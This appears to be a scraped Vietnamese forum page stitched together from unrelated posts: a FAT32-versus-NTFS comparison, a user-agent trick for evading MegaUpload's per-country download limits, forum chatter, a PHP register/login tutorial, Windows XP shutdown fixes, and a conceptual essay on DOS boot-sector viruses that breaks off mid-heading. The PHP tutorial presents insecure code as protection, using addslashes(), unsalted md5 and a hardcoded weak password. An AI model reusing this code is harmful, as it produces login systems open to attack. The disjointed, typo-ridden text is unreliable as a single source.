FAT32: được giới thiệu trong phiên bản Windows 95 Service Pack 2 (OSR 2), được xem là phiên bản mở rộng của FAT16. Do sử dụng không gian địa chỉ 32 bit nên FAT32 hỗ trợ nhiều cluster trên một partition hơn, do vậy không gian đĩa cứng được tận dụng nhiều hơn. Ngoài ra với khả năng hỗ trợ kích thước của phân vùng từ 2GB lên 2TB và chiều dài tối đa của tên tập tin được mở rộng đến 255 ký tự đã làm cho FAT16 nhanh chóng bị lãng quên. Tuy nhiên, nhược điểm của FAT32 là tính bảo mật và khả năng chịu lỗi (Fault Tolerance) không cao.

NTFS (New Technology File System): được giới thiệu cùng với phiên bản Windows NT đầu tiên (phiên bản này cũng hỗ trợ FAT32). Với không gian địa chỉ 64 bit, khả năng thay đổi kích thước của cluster độc lập với dung lượng đĩa cứng, NTFS hầu như đã loại trừ được những hạn chế về số cluster, kích thước tối đa của tập tin trên một phân vùng đĩa cứng.

NTFS sử dụng bảng quản lý tập tin MFT (Master File Table) thay cho bảng FAT quen thuộc nhằm tăng cường khả năng lưu trữ, tính bảo mật cho tập tin và thư mục, khả năng mã hóa dữ liệu đến từng tập tin. Ngoài ra, NTFS có khả năng chịu lỗi cao, cho phép người dùng đóng một ứng dụng “chết” (not responding) mà không làm ảnh hưởng đến những ứng dụng khác. Tuy nhiên, NTFS lại không thích hợp với những ổ đĩa có dung lượng thấp (dưới 400 MB) và không sử dụng được trên đĩa mềm.

So sánh giữa FAT32 và NTFS

NTFS là hệ thống file tiên tiến hơn rất nhiều so với FAT32. Nó có đầy đủ các đặc tính của hệ thống file hiện đại và FAT32 không hề có. Bạn nên dùng NTFS để thay thế cho FAT32 vì các lý do sau:

- FAT32 không hỗ trợ các tính năng bảo mật như phần quyền quản lý, mã hoá.. như NTFS. Vấn đề này đặc biệt hiệu quả đối với Windows. Với NTFS, bạn có thể không cần sử dụng các tiện ích mã hoá hay đặt mật khẩu giấu thư mục v.v, vì đây là đặc tính đã có sẵn của NTFS, chỉ cần bạn biết khai thác. Việc xài các tiện ích không nằm sẵn trong hệ điều hành để thao tác trực tiếp với đĩa vẫn có ít nhiều rủi ro.

- FAT32 có khả năng phục hồi và chịu lỗi rất kém so với NTFS. Có một số ý kiến cho rằng NTFS không tương thích nhiều với các chương trình kiểm tra đĩa hay sửa đĩa mà người dùng đã quen thuộc từ lâu, như vậy sẽ vô cùng bất tiên trong trường hợp đĩa bị hư sector. Nên yên tâm vì NTFS là hệ thống file có khả năng ghi lại được các hoạt động mà hệ điều hành đã và đang thao tác trên dữ liệu, nó có khả năng xác định được ngay những file bị sự cố mà không cần phải quét lại toàn bộ hệ thống file, giúp quá trình phục hồi dữ liệu trở nên tin cậy và nhanh chóng hơn. Đây là ưu điểm mà FAT 32 hoàn toàn không có.

Khi mà mất điện đột ngột thì Windows 98, 2000, XP… đều phải quét lại đĩa khi khởi động lại nếu đĩa đó được format bằng chuẩn FAT32. Trong khi format đĩa cứng bằng NTFS thì lại hoàn toàn không cần quét đĩa lại, bởi vì hệ thống dùng NTFS có được những thông tin về tính toàn vẹn dữ liệu ghi trên đĩa và nó mất rất ít thời gian để biết được về mặt logic đĩa của mình có lỗi hay không và nếu có thì hệ thống cũng tự phục hồi một cách cực kỳ đơn giản và nhanh chóng. Với FAT32 thì nó phải rà quét toàn bộ lâu hơn nhiều. Một hệ thống Windows 2000, XP sẽ ổn định hơn nhiều nếu cài trên phân vùng được format bằng NTFS. Ngoài ra NTFS còn được trang bị công cụ kiểm tra và sửa đĩa rất tốt của Microsoft.

- NTFS có khả năng truy cập và xử lý file nén ngon lành hệt như truy cập vào các file chưa nén, điều này không chỉ tiết kiệm được đĩa cứng mà còn gia tăng được tuổi thọ của đĩa cứng.

- Nhiều người phàn nàn rằng không thể truy cập vào các đĩa cứng được format bằng NTFS khi đang ở DOS, Windows 98 hoặc WinME… Thực ra thì DOS, Windows 98 và Windows ME đã quá cũ và các phần mềm còn hữu dụng của chúng cũng không còn bao nhiêu.

- NTFS đặt được quota sử dụng cho người dùng, vô cùng tiện dụng cho các hệ thống máy ở công ty. Đặc biệt tiện dụng khi “âm thầm” cấm được con cái sao chép những phim ảnh độc hại vào các thư mục “bí mật” của chúng trong đĩa cứng.

Ngoài ra, NTFS còn có rất nhiều tiện ích tuyệt chiêu chuyên sâu khác cho giới người dùng cao cấp khác như “mount partition”, tạo “hard link” tới một file, hỗ trợ dùng RAID v.v

- Nếu bạn đã thực sự quyết định chọn NTFS làm “duyên giai ngẫu” thì bạn có thể từ bỏ hẳn FAT 32 kể từ nay. Hiện có rất nhiều tiện ích chuyển đổi từ FAT 32 sang NTFS tùy bạn lựa chọn. Tiện hơn cả là dùng bộ tiện ích có sẵn trong các đĩa CD khởi động bằng Hirenboot đang rất phổ biến hiện nay.

Tuy thế, FAT32 vẫn còn tỏ ra hữu dụng trên các máy tính cấu hình quá yếu ớt, chỉ có thể chạy được Windows 98. FAT16 và FAT32 vẫn được dùng để định dạng cho các loại thẻ nhớ, vì các thiết bị chấp nhận thẻ nhớ như máy ảnh số, máy nghe nhạc vẫn chưa thấy loại nào tương thích với NTFS cả. FAT16 luôn là lựa chọn hàng đầu khi bạn muốn copy dữ liệu của mình từ một máy tính chạy Windows sang máy chạy hệ điều hành khác như Mac chẳng hạn. Hầu hết các máy Mac hiện nay đều không thể nhận dạng các thẻ nhớ USB được định dạng bằng FAT 32.
1/ Đối với IE & Maxthon (kể cả những trình duyệt mà có nhân IE như Avant Browser)
- Trước tiên, vào Menu Start --> chọn Run --> Regedit --> OK
- Trong cửa sổ Registry Editor, bạn chọn nhánh :
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet\Settings\5.0\User Agent\Post Platform]
- Lưu ý : nếu bạn không tìm thấy User Agent (do sử dụng trình duyệt IE 7.0 trở lên) thì hãy chọn nhánh dưới đây:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\User Agent\Post Platform]
- Tiếp theo, bạn nhấn phải chuột vào mục Post Platform --> chọn New --> chọn tiếp String Value và đặt tên cho giá trị vừa tạo là Alexa Toolbar
- Sau cùng, bạn khởi động lại máy để việc thêm User Agent có tác dụng. Bây giờ bạn đã có thể tự do down file từ MegaUpload mà không gặp phải thông báo lỗi "All download slots (100) assigned to your country (Viet Nam) are in use"

2/ Đối với Firefox : bạn chỉ việc cài thêm User Agent Switcher 0.6.8 cho FireFox
- Trước tiên, bạn dùng trình duyệt Firefox để truy cập trang http://addons.mozilla.org/firefox/59/
- Sau khi đã Install và cài Add-on này vào bạn phải tắt trình duyệt và mở lại
- Sau khi mở lại trình duyệt Firefox, bạn vào menu Tools --> chọn User Agent Switcher --> chọn Options --> chọn tiếp Options
- Hộp thoại User Agent Switcher Options lại hiện ra, bạn nhấn nút chọn mục User Agents --> nhấn nút Add và điền vào các thông số vào bảng Add User Agent như sau:
+ Description : MEGAUPLOAD
+ User Agent : Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar) (cẩn thận nhé, phải đánh y hệt đấy)
+ Nhấn OK 2 lần để hòan tất việc thêm User Agent.
- Từ bây giờ trước khi down 1 file nào từ MegaUpload, bạn chỉ cần vào Tools này, chọn User Agent Switcher và chọn MegaUpload mà bạn vừa mới thêm vào, vậy là có thể down file từ MegaUpload mà không cần phải bận tâm đến việc tìm kiếm proxy hay sử dụng chương trình giấu IP nữa
Bài này tui chỉ Sưu tầm thôi mà. Nói như thế làm tui mắc cỡ. :">
Trong box Thảo luận bảo mật không thể xem được bài viết. Không biết là sao nữa. Vào chỉ thấy có mỗi bài DrDoS ah
Hehe. Ngay cả conmale mà cũng là ducks thì bạn làm gì mà có chức vụ?? smilie
Còn em thì bị Trang này thuộc khu vực cấm. Ra vô mỏi tay luôn
Có lẽ vì mới đc xây dựng lại nên HVA chưa kịp up lên đó mà
Link here: http://www.appleblossomart.net/xpstyles.php
Bạn đang làm 1 website ? Site của bạn thuộc dạng chuyên nghiệp ? hay nghiệp dư ? ... thì cơ bản bạn cũng phải cần đến 1 trang đăng ký dùng để tạo tài khoản và trang đăng nhập dùng để truy nhập tài khoản đã đăng ký. Trong phạm vi bài viết này tôi sẽ trình bày cách viết 1 trang đăng ký, đăng nhập cơ bản mà bạn có thể ứng dụng ngay (Mì ăn liền mà :p).

1. Tạo kết nối database:

Tạo file "mysql.php" có code như sau:


<?php

$db_host = "localhost"; // Giữ mặc định là localhost
$db_name = "sanchoituoitre.info"; // Cần thay đổi..
$db_username = "lyhuuloi"; // Cần thay đổi..
$db_password = "123456"; // Cần thay đổi..

@mysql_connect("{$db_host}", "{$db_username}", "{$db_password}") or die("Không thể kết nối database");
@mysql_select_db("{$db_name}") or die("Không thể chọn database");

?>


Bạn cần phải thay đổi thông tin ở 3 biến $db_name, $db_username, $db_password cho phù hợp với thông tin database của bạn.

1.1. Tạo table "members" dùng dể chứa thông tin thành viên:

Sau đó bạn tạo file "create_members_table.php" có code như sau:


<?php

require_once("mysql.php");

@mysql_query("CREATE TABLE `members` (
`id` INT( 11 ) NOT NULL AUTO_INCREMENT ,
`username` VARCHAR( 128 ) NOT NULL ,
`password` VARCHAR( 32 ) NOT NULL ,
`email` VARCHAR( 255 ) NOT NULL ,
PRIMARY KEY ( `id` )
) TYPE = MYISAM ;");

print "Table \"members\" đã được tạo.";

?>


Bạn tiếp tục chạy luôn file "create_members_table.php" này để tiến hành tạo table "members", sau khi tạo xong thì xóa file này đi. Nếu bạn đã quen sử dụng phpMyAdmin thì bạn có thể tự tạo table này, còn đối với newbie thì nên làm theo cách của tôi, sau này bạn có thể tự tìm hiểu thêm.

2. Tạo trang đăng ký:

Tạo file "register.php" có code như sau:


<?php

// Tải file mysql.php lên
require_once("mysql.php");

if ( $_GET['act'] == "do" )
{

// Dùng hàm addslashes() để tránh SQL injection, dùng hàm md5() để mã hóa password
$username = addslashes( $_POST['username'] );
$password = md5( addslashes( $_POST['password'] ) );
$verify_password = md5( addslashes( $_POST['verify_password'] ) );
$email = addslashes( $_POST['email'] );

// Kiểm tra 4 thông tin, nếu có bất kỳ thông tin chưa điền thì sẽ báo lỗi
if ( ! $username || ! $password || ! $verify_password || ! $email )
{
print "Xin vui lòng nhập đầy đủ các thông tin. <a href='javascript:history.go(-1)'>Nhấp vào đây để quay trở lại</a>";
exit;
}

// Kiểm tra mật khẩu, bắt buộc mật khẩu nhập lúc đầu và mật khẩu lúc sau phải trùng nhau
if ( $password != $verify_password )
{
print "Mật khẩu không giống nhau, bạn hãy nhập lại mật khẩu. <a href='javascript:history.go(-1)'>Nhấp vào đây để quay trở lại</a>";
exit;
}

// Tiến hành tạo tài khoản
@mysql_query("INSERT INTO members (username, password, email) VALUES ('{$username}', '{$password}', '{$email}')");

// Thông báo hoàn tất việc tạo tài khoản
print "Tài khoản {$username} đã được tạo. <a href='login.php'>Nhấp vào đây để đăng nhập</a>";

}
else
{

// Form đăng ký
print <<<EOF
<form action="register.php?act=do" method="post">
Tên truy nhập: <input type="text" name="username" value="">
Mật khẩu: <input type="password" name="password" value="">
Xác nhận mật khẩu: <input type="password" name="verify_password" value="">
Địa chỉ E-mail: <input type="text" name="email" value="">
<input type="submit" name="submit" value="Đăng ký tài khoản">
</form>
EOF;

}

?>


3. Tạo trang đăng nhập:

Tạo file "login.php" có code như sau:


<?php

// Tải file mysql.php lên
require_once("mysql.php");

if ( $_GET['act'] == "do" )
{

// Dùng hàm addslashes() để tránh SQL injection, dùng hàm md5() để mã hóa password
$username = addslashes( $_POST['username'] );
$password = md5( addslashes( $_POST['password'] ) );

// Lấy thông tin của username đã nhập trong table members
$sql_query = @mysql_query("SELECT id, username, password FROM members WHERE username='{$username}'");
$member = @mysql_fetch_array( $sql_query );

// Nếu username này không tồn tại thì....
if ( @mysql_num_rows( $sql_query ) <= 0 )
{
print "Tên truy nhập không tồn tại. <a href='javascript:history.go(-1)'>Nhấp vào đây để quay trở lại</a>";
exit;
}

// Nếu username này tồn tại thì tiếp tục kiểm tra mật khẩu
if ( $password != $member['password'] )
{
print "Nhập sai mật khẩu. <a href='javascript:history.go(-1)'>Nhấp vào đây để quay trở lại</a>";
exit;
}

// Khởi động phiên làm việc (session)
session_start();
$_SESSION['user_id'] = $member['id'];

// Thông báo đăng nhập thành công
print "Bạn đã đăng nhập với tài khoản {$member['username']} thành công. <a href='index.php'>Nhấp vào đây để vào trang chủ</a>";

}
else
{

// Form đăng nhập
print <<<EOF
<form action="login.php?act=do" method="post">
Tên truy nhập: <input type="text" name="username" value="">
Mật khẩu: <input type="password" name="password" value="">
<input type="submit" name="submit" value="Đăng nhập">
</form>
EOF;

}

?>


4. Tạo trang chủ:

Tạo file "index.php" với code như sau:


<?php

// Tải file mysql.php lên
require_once("mysql.php");

// Khởi động phiên làm việc
session_start();

if ( !$_SESSION['user_id'] )
{

print <<<EOF
Bạn chưa đăng nhập! <a href='login.php'>Nhấp vào đây để đăng nhập</a>
EOF;

}
else
{

$user_id = intval($_SESSION['user_id']);

$sql_query = @mysql_query("SELECT * FROM members WHERE id='{$user_id}'");
$member = @mysql_fetch_array( $sql_query );

print <<<EOF
Bạn đang đăng nhập với tài khoản {$member['username']}.
EOF;

}

?>

-Reboot lại máy thay vì là Shutdown.
Hầu hết lỗi shutdown của Windows XP được báo là do khi tắt máy thì nó lại khởi động lại, đây là hiện tượng mang tính phổ biến toàn cầu được tổng hợp lại từ nhiều trường hợp, hiện tượng bởi vì theo thiết kế thì Windows XP sẽ tự động khởi động lại máy khi hệ thống bị lỗi. Chính vì thế có bất cứ sự cố nào của hệ thống sẽ làm cho máy tính khởi động lại khi tắt máy. Để khắc phục hiện tượng " Khởi động lại máy khi hệ thống có lỗi" thì hãy bấm chuột phải vào My Computer/Properties/Tab Advanced/dưới hộp Startup&Recover bỏ đi câu "System Reboot".
-Sau đây là một số hiện tượng làm máy tính khởi động lại thay vì là tắt đi :
Hiện nay phần mềm Roxio/Adaptect Easy CD/ Direct CD được xem như là một phần mềm gây ra lỗi Shutdown chủ yếu nhất, giải pháp đối với phần mềm này là bạn phải tải về phần mềm sửa lỗi cho cả hai phiên bản Platium và Basic Edition of Easy CD Creator 5. với phần mềm sửa lỗi này bạn có thể giảm được một nửa nguy cơ bị lỗi Shutdown.
Một trong những cảnh báo đối với những người phải sử dụng phần mềm sửa lỗi này là hãy đọc kỹ những hướng dẫn vì Roxio/Adaptect Easy CD Creator Platinium 5 có thể thực sự không hoạt động tốt đối với Windows XP. Nếu người sử dụng bỏ qua không tham khảo những hướng dẫn của Roxio có thể máy của bạn sẽ chịu sự rủi ro về lỗi Shutdown hoặc không Boot máy được
-Hầu hết mọi người sử dụng Easy CD Creator đều không gặp lỗi nếu họ không cài thêm phần Direct CD
-Rất nhiều người đã giải quyết lỗi Shutdown của Windows XP bằng cách xoá đi file UDFRINST đây là một phần của phần mềm Roxio CD/RW cho hệ thống chứ không phải cho Direct CD.
-Một số người cũng đã thử xoá đi file CDRALW2K.SYS thì cũng giải quyết được lỗi Shutdown nhưng trường hợp này làm cho chức năng của CD không hoạt động.
-Roxio Video Part 5 cũng là một trong những nguyên nhân gây ra sự cố nói trên bởi vì nó chứa đựng những phần chính của Easy CD 5. Giải pháp đối với trường hợp này là chúng ta cũng phải xoá đi file CDRALW2K.SYS
-APM (Advance Power Manager) không được bật lên có thể gây ra hai trường hợp:
-Một số người nói rằng Windows XP khởi động lại khi tắt nếu như APM được bật lên
-Một số người có ý kiến hoàn toàn trái ngược cho rằng nó giống như vấn đề của Windows 2000 liên quan đến vấn đề tiêu chuẩn của phần cứng và sự tương thích của nó hay BIOS cũng giống như các hệ điều hành NT khác đều dựa vào sự tương thích của phần cứng đối với hệ điều hành cũng là một trong những khả năng gây ra lỗi này.
-Y-SB3 Logitech Internet Keyboard cũng có thể gây ra hiện tượng này, tuy nhiên nếu bạn sử dụng nó như một loại Keyboard bình thường thì không có vấn đề gì ngoại trừ bạn cài thêm phần mềm Key Commander là một phần dùng để điều khiển những chức năng đặc biệt của Internet. Một điều không may đó là Logitech đã quyết định họ sẽ không update driver mới cho loại Keyboard này.
-Logitech MouseWare 8.6 là phần mềm gây ra lỗi BSOD (Blue Screen of Death) với file KBDCLASS.SYS và phần mềm MouseWare 9.1. Đối với trường hợp này thì chúng ta phải gỡ bỏ phần mềm ra thì mới giải quyết được vấn đề.
Máy bị treo trong lúc đang " Saving Your Settings"
Trong quá trình Shutdown hay Reboot, Windows có thể bị treo trong lúc màn hình đang ở trạng thái "Saving Your Settings" trong lúc đang treo máy thì không có tác dụng gì đối với phím Ctr + Alt + Del và chuột có thể sẽ không hoạt động. tình trạng này có thể thỉnh thoảng xảy ra.
Đây là một lỗi trong Windows XP mà Microsoft đã hỗ trợ bản sửa lỗi bởi vì bản sửa lỗi này dự định dùng cho việc kiểm tra chất lượng trong tương lai do đó Microsoft khuyến cáo chỉ nên sử dụng nếu vấn đề trở nên nghiêm trọng, còn lại thì tất cả mọi người nên đợi bản Servicepack 1 sẽ bao gồm bản phiên bản sửa lỗi ổn định hơn cho lỗ hổng này. để biết thêm chi tiết các bạn có thể tham khảo tại MSKB Q307274
Ghi Chú : Trong bản hướng dẫn nói rằng nếu bạn muốn lấy bản sửa lỗi này thì liên hệ với Microsoft, tuy nhiên bạn vẫn có thể download tại trang Windows Update dưới mục "Recommended Updates" đối với Windows XP Professional có tựa đề là "Restarting Windows XP"
Một số người đã đưa ra giải pháp đó là gỡ bỏ màn hình Welcome Logon của Windows XP bằng cách vào Control Panel/User Account/Change the Way User Logon or off sau đó chọn bỏ câu "Use the welcome screen" . Lựa chọn này sẽ loại bỏ màn hình logon và thay vào đó là kiểu logon Classic mà bạn phải điền User name và Password mỗi khi logon.
Card âm thanh SBLive file DEVLDR32.EXE
Trong thế hệ Windows Me card âm thanh SoundBlaster Live đã bị cáo buộc là kẻ đã gây ra lỗi Shutdown và lịch sử đã lập lại đối với chính nó trong bản beta của Windows XP. Giải pháp là bạn phải dùng driver phiên bản mới nhất dùng cho Windows XP.
Sau đây là một số báo cáo những hiện tượng mà có thể gây ra treo máy đó là trong lúc ra lệnh tắt máy thì không có gì xuất hiện trên màn hình và thời chờ kéo dài ngay cả khi chúng ta sử dụng lệnh EndTask để kết thúc hoạt động của file DEVLDR32.EXE cũng không có tác dụng mà cuối cùng chúng ta đành phải sử dụng phương pháp cuối cùng đó là ngắt nguồn điện (tình trạng này xảy ra đối với SBlive trong Windows 2000) một trong những phương pháp dùng để loại bỏ lỗi này đó là lấy card SBlive ra và boot máy lại vào Safemode vào C:WindowsSystem32 tìm file DEVLDR và xoá đi.
Một số trường hợp được báo rằng mặc dù họ đã cài driver mới nhưng tình trạng như mô tả đối với file DEVLDR vẫn tiếp tục tiếp diễn thì chúng ta phải áp dụng một số biện pháp sau đây:
-Cài đặt driver của SBlive với phiên bản 5.1 đối với Windows 2000 Professional
-Việc update driver trong Windows Xp có thể gây ra một số vấn đề nếu như chức năng Multiuser được bật lên và việc chuyển giao qua lại giữa các user trong phiên làm việc của Windows thì có một số file có cùng tên(nhưng khác phiên bản) thường nằm ở i386, SYSTEM32 và SYSTEM32REINSTALLBACKUPS


*Virus

Virus tin học hiện nay đang là nỗi băn khoăn lo lắng của những người làm công tác tin học, là nỗi lo sợ của những người sử dụng khi máy tính của mình bị nhiễm virus. Khi máy tính của mình bị nhiễm virus, họ chỉ biết trông chờ vào các phần mềm diệt virus hiện có trên thị trường, trong trường hợp các phần mềm này không phát hiện hoặc không tiêu diệt được, họ bị lâm phải tình huống rất khó khăn, không biết phải làm như thế nào.
Vì lý do đó, có một cách nhìn nhận cơ bản về cơ chế và các nguyên tắc hoạt động của virus tin học là cần thiết. Trên cơ sở đó, có một cách nhìn đúng đắn về virus tin học trong việc phòng chống, kiểm tra, chữa trị cũng như cách phân tích, nghiên cứu một virus mới xuất hiện.

I. Virus tin học.

Thuật ngữ virus tin học dùng để chỉ một chương trình máy tính có thể tự sao chép chính nó lên nơi khác (đĩa hoặc file) mà người sử dụng không hay biết. Ngoài ra, một đặc điểm chung thường thấy trên các virus tin học là tính phá hoại, nó gây ra lỗi thi hành, thay đổi vị trí, mã hoá hoặc huỷ thông tin trên đĩa.

II. Phân loại:

Thông thường, dựa vào đối tượng lây lan là file hay đĩa mà virus được chia thành hai nhóm chính:

- B-virus: Virus chỉ tấn công lên Master Boot hay Boot Sector.

- F-virus: Virus chỉ tấn công lên các file khả thi.

Mặc dù vậy, cách phân chia này cũng không hẳn là chính xác. Ngoại lệ vẫn có các virus vừa tấn công lên Master Boot (Boot Sector) vừa tấn công lên file khả thi.

Ðể có một cách nhìn tổng quan về virus, chúng ta xem chúng dành quyền điều khiển như thế nào.

a. B-virus.

Khi máy tính bắt đầu khởi động (Power on), các thanh ghi phân đoạn đều được đặt về 0FFFFh, còn mọi thanh ghi khác đều được đặt về 0. Như vậy, quyền điều khiển ban đầu được trao cho đoạn mã tại 0FFFFh: 0h, đoạn mã này thực ra chỉ là lệnh nhảy JMP FAR đến một đoạn chương trình trong ROM, đoạn chương trình này thực hiện quá trình POST (Power On Self Test - Tự kiểm tra khi khởi động).

Quá trình POST sẽ lần lượt kiểm tra các thanh ghi, kiểm tra bộ nhớ, khởi tạo các Chip điều khiển DMA, bộ điều khiển ngắt, bộ điều khiển đĩa... Sau đó nó sẽ dò tìm các Card thiết bị gắn thêm để trao quyền điều khiển cho chúng tự khởi tạo rồi lấy lại quyền điều khiển. Chú ý rông đây là đoạn chương trình trong ROM (Read Only Memory) nên không thể sửa đổi, cũng như không thể chèn thêm một đoạn mã nào khác.

Sau quá trình POST, đoạn chương trình trong ROM tiến hành đọc Boot Sector trên đĩa A hoặc Master Boot trên đĩa cứng vào RAM (Random Acess Memory) tại địa chỉ 0:7C00h và trao quyền điều khiển cho đoạn mã đó bông lệnh JMP FAR 0:7C00h. Ðây là chỗ mà B-virus lợi dụng để tấn công vào Boot Sector (Master Boot), nghĩa là nó sẽ thay Boot Sector (Master Boot) chuẩn bông đoạn mã virus, vì thế quyền điều khiển được trao cho virus, nó sẽ tiến hành các hoạt động của mình trước, rồi sau đó mới tiến hành các thao tác như thông thường: Ðọc Boot Sector (Master Boot) chuẩn mà nó cất giấu ở đâu đó vào 0:7C00h rồi trao quyền điều khiển cho đoạn mã chuẩn này, và người sử dụng có cảm giác rông máy tính của mình vẫn hoạt động bình thường.

b. F-virus.

Khi DOS tổ chức thi hành File khả thi (bông chức năng 4Bh của ngắt 21h), nó sẽ tổ chức lại vùng nhớ, tải File cần thi hành và trao quyền điều khiển cho File đó. F-virus lợi dụng điểm này bông cách gắn đoạn mã của mình vào file đúng tại vị trí mà DOS trao quyền điều khiển cho File sau khi đã tải vào vùng nhớ. Sau khi F-virus tiến hành xong các hoạt động của mình, nó mới sắp xếp, bố trí trả lại quyền điều khiển cho File để cho File lại tiến hành hoạt động bình thường, và người sử dụng thì không thể biết được.

Trong các loại B-virus và F-virus, có một số loại sau khi dành được quyền điều khiển, sẽ tiến hành cài đặt một đoạn mã của mình trong vùng nhớ RAM như một chương trình thường trú (TSR), hoặc trong vùng nhớ nôm ngoài tầm kiểm soát của DOS, nhôm mục đích kiểm soát các ngắt quan trọng như ngắt 21h, ngắt 13h,... Mỗi khi các ngắt này được gọi, virus sẽ dành quyền điều khiển để tiến hành các hoạt động của mình trước khi trả lại các ngắt chuẩn của DOS.

III. Các đặc điểm của B-VIRUS.

Qua chương trước, chúng ta đã đưa ra các thông tin hết sức cơ bản về cấu trúc đĩa, tiến trình khởi động và cách thức tổ chức vùng nhớ, tổ chức thi hành file của DOS. Những thông tin đó giúp chúng ta tìm hiểu những đặc điểm cơ bản của virus, từ đó đưa ra cách phòng chống, chữa trị trong trường hợp máy bị nhiễm virus.

1. Phân loại B-virus.

Như chúng ta đã biết, sau quá trình POST, sector đầu tiên trên đĩa A hoặc đĩa C được đọc vào vùng nhớ tại 0: 7C00, và quyền điều khiển được trao cho đoạn mã trong sector khởi động này. B-virus hoạt động bông cách thay thế đoạn mã chuẩn trong sector khởi động này bông đoạn mã của nó để chiếm quyền điều khiển, sau khi đã cài đặt xong mới đọc sector khởi động chuẩn được virus cất giữ ở đâu đó vào 0:7C00 và trả lại quyền điều khiển cho đoạn mã chuẩn này. Việc cất giữ sector khởi động tại vị trí nào trên đĩa tuỳ thuộc loại đĩa và cách giải quyết của từng loại virus. Ðối với đĩa cứng, thông thường nó được cất giữ ở đâu đó trong Side 0, Cylinder 0 vì trong cả track này, DOS chỉ sử dụng sector đầu tiên cho bảng Partition. Trên đĩa mềm, vị trí cất giữ sẽ phức tạp hơn vì mọi chỗ đều có khả năng bị ghi đè thông tin. Một số hướng sau đây đã được các virus áp dụng:

Sử dụng sector ở cuối Root Directory, vì nó thường ít được sử dụng.

Sử dụng các sector cuối cùng trên đĩa, vì khi phân bổ vùng trống cho file, DOS tìm vùng trống từ nhỏ đến lớn cho nên vùng này thường ít được sử dụng.

Ghi vào vùng trống trên đĩa, đánh dấu trong bảng FAT vùng này là vùng bị hỏng để DOS không sử dụng cấp phát nữa. Ccáh làm này an toàn hơn các cách làm trên đây.

Format thêm track và ghi vào track vừa được Format thêm.

Tùy thuộc vào độ lớn của đoạn mã virus mà B-virus được chia thành hai loại:

a. SB-virus.

Chương trình của SB-virus chỉ chiếm đúng một sector khởi động, các tác vụ của SB-virus không nhiều và tương đối đơn giản. Hiện nay số các virus loại này thường ít gặp và có lẽ chỉ là các virus do trong nước "sản xuất".

b. DB-virus.

Ðây là những loại virus mà đoạn mã của nó lớn hơn 512 byte (thường thấy).

Vì thế mà chương trình virus được chia thành hai phần:

- Phần đầu virus: Ðược cài đặt trong sector khởi động để chiếm quyền điều hiển khi quyền điều khiển được trao cho sector khởi động này. Nhiệm vụ duy nhất của phần đầu là: tải tiếp phần thân của virus vào vùng nhớ và trao quyền điều khiển cho phần thân đó. Vì nhiệm vụ đơn giản như vậy nên phần đầu của virus thường rất ngắn, và càng ngắn càng tốt vì càng ngắn thì sự khác biệt giữa sector khởi động chuẩn và sector khởi động đã bị nhiễm virus càng ít, giảm khả năng bị nghi ngờ.

- Phần thân virus: Là phần chương trình chính của virus. Sau khi được phần đầu tải vào vùng nhớ và trao quyền, phần thân này sẽ tiến hành các tác vụ của mình, sau khi tiến hành xong mới đọc sector khởi động chuẩn vào vùng nhớ và trao quyền cho nó để máy tính làm việc một cách bình thường như chưa có gì xảy ra cả.

2. Một số kỹ thuật cơ bản của B-virus.

Dù là SB-virus hay DB-virus, nhưng để tồn tại và lây lan, chúng đều có một số các kỹ thuật cơ bản như sau:

a. Kỹ thuật kiểm tra tính duy nhất.

Virus phải tồn tại trong bộ nhớ cũng như trên đĩa, song sự tồn tại quá nhiều bản sao của chính nó trên đĩa và trong bộ nhớ sẽ chỉ làm chậm quá trình Boot máy, cũng như chiếm quá nhiều vùng nhớ ảnh hưởng tới việc tải và thi hành các chương trình khác đồng thời cũng làm giảm tốc độ truy xuất đĩa. Chính vì thế, kỹ thuật này là một yêu cầu nghiêm ngặt với B-virus.

Việc kiểm tra trên đĩa có hai yếu tố ảnh hưởng:

Thứ nhất là thời gian kiểm tra:

Nếu mọi tác vụ đọc/ghi đĩa đều phải kiểm tra đĩa thì thời gian truy xuất sẽ bị tăng gấp đôi, làm giảm tốc độ truy xuất cũng như gia tăng mỗi nghi ngờ.

Ðối với yêu cầu này, các virus áp dụng một số kỹ thuật sau: Giảm số lần kiểm tra bông cách chỉ kiểm tra trong trường hợp thay đổi truy xuất từ ổ đĩa này sang ổ đĩa khác, chỉ kiểm tra trong trường hợp bảng FAT trên đĩa được đọc vào.

Thứ hai là kỹ thuật kiểm tra:

Hầu hết các virus đều kiểm tra bông giá trị từ khoá. Mỗi virus sẽ tạo cho mình một giá trị đặc biệt tại một vị trí xác định trên đĩa, việc kiểm tra được tiến hành bông cách đọc Boot record và kiểm tra giá trị của từ khoá này. Kỹ thuật này gặp trở ngại vì số lượng B-virus ngày một đông đảo, mà vị trí trên Boot Record thì có hạn. Cách khắc phục hiện nay của các virus là tăng số lượng mã lệnh cần so sánh để làm giảm khả năng trùng hợp ngẫu nhiên.

Ðể kiểm tra sự tồn tại của mình trong bộ nhớ, các virus đã áp dụng các kỹ thuật sau: Ðơn giản nhất là kiểm tra giá trị Key value tại một vị trí xác định trên vùng nhớ cao, ngoài ra một kỹ thuật khác được áp dụng đối với các virus chiếm ngắt Int 21 của DOS là yêu cầu thực hiện một chức năng đặc biệt không có trong ngắt này. Nếu cờ báo lỗi được bật lên thì trong bộ nhớ chưa có virus, ngược lại nếu virus đã lưu trú trong vùng nhớ thì giá trị trả lại (trong thanh ghi AX chẳng hạn) là một giá trị xác định nào đó.

b. Kỹ thuật lưu trú.

Sau khi thực hiện xong chương trình POST, giá trị tổng số vùng nhớ vừa được Test sẽ được lưu vào vùng BIOS Data ở địa chỉ 0:413h. Khi hệ điều hành nhận quyền điều khiển, nó sẽ coi vùng nhớ mà nó kiểm soát là giá trị trong địa chỉ này. Vì vậy để lưu trú, mọi B-virus đều áp dụng kỹ thuật sau đây: Sau khi tải phần lưu trú của mình lên vùng nhớ cao, nó sẽ giảm giá trị vùng nhớ do DOS quản lý tại 0:413h đi một lượng đúng bông kích thước của virus. Tuy nhiên nếu không kiểm tra tốt sự có mặt trong vùng nhớ, khi bị Boot mềm liên tục, giá trị tổng số vùng nhớ này sẽ bị giảm nhiều lần, ảnh hưởng tới việc thực hiện của các chương trình sau này. Chính vì thế, các virus được thiết kế tốt phải kiểm tra sự tồn tại của mình trong bộ nhớ, nếu đã có mặt trong bộ nhớ thì không giảm dung lượng vùng nhớ nữa.

c. Kỹ thuật lây lan.

